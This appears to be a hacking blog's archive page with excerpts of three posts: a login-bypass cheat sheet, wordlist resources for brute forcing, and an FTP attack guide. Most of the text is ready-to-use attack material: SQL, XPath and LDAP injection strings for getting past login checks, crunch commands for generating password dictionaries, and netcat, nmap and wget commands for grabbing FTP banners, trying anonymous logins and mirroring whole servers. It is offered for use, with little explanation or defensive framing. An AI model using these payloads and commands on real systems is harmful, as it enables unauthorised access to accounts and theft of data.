Posts

Showing posts from July, 2022

Atuh bypass | Login bypass

  Authentication bypass :- Authentication Bypass (Raw. MD5): "SELECT * FROM admin WHERE pass = '" .md5($password, true )."' " md5 (" ffifdyop ", true ) = ' or ' 6 �]��!r,��b� Hash Authentication Bypass: admin ' AND 1=0 UNION ALL SELECT 'admin', ' 81dc9bdb52d04dc20036dbd8313ed055 ' GBK Authentication Bypass: %A8%27 OR 1=1;-- 2 %8C%A8%27 OR 1=1-- 2 %bf' or 1=1 -- -- Login bypass list :- admin password 1234 123456 root toor test guest ' or '1'='1 ' or ''=' ' or 1]%00 ' or /* or ' ' or "a" or ' ' or 1 or ' ' or true() or ' 'or string-length(name(.))<10 or' 'or contains(name,'adm') or' 'or contains(.,'adm') or' 'or position()=2 or' admin' or ' admin' or '1'='2 * *)(& *)(|(& pwd) *)(|(* *))%00 admin)(&) pwd admin)(!(&(| pwd)) admin))(|(| 1234 '-...

Brute Force list | Password Username Wordlist

  Default Credentials :- Links: https://www.cirt.net/passwords http://www.passwordsdatabase.com/ https://many-passwords.github.io/ https://github.com/ihebski/DefaultCreds-cheat-sheet http://www.vulnerabilityassessment.co.uk/passwordsC.htm https://192-168-1-1ip.mobi/default-router-passwords-list/ https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv https://github.com/danielmiessler/SecLists https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm Create your own Dictionaries :- Crunch:- crunch 4 6 0123456789ABCDEF -o crunch1.txt # From length 4 to 6 using that alphabet crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst) @ ...

Hacking FTP | How to hack FTP

What is FTP :- The File Transfer Protocol ( FTP ) is a standard network protocol used for the transfer of computer files between a client and server on a computer network. Default Port :- 21 Enumeration :- Banner Grabbing: • nc -vn < IP > 21 • openssl s_client -connect crossfit.htb:21 -starttls ftp # Get certificate if any Anonymous login :- anonymous : anonymous anonymous : ftp : ftp ftp < IP > > anonymous > anonymous > ls -a # List all files (even hidden) yes, they could be hidden) > binary # Set transmission to binary instead of ascii > ascii # Set transmission to ascii instead of binary > bye # exit Automated :- Anon login and bounce FTP checks are perform by default by nmap with - sC option or : nmap --script ftp-* -p 21   < ip > Download all files from FTP :- • wget -m ftp://anonymous:anonymous@10.10.10.98 # Donwload all • wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Download all Filezilla Server Vuln...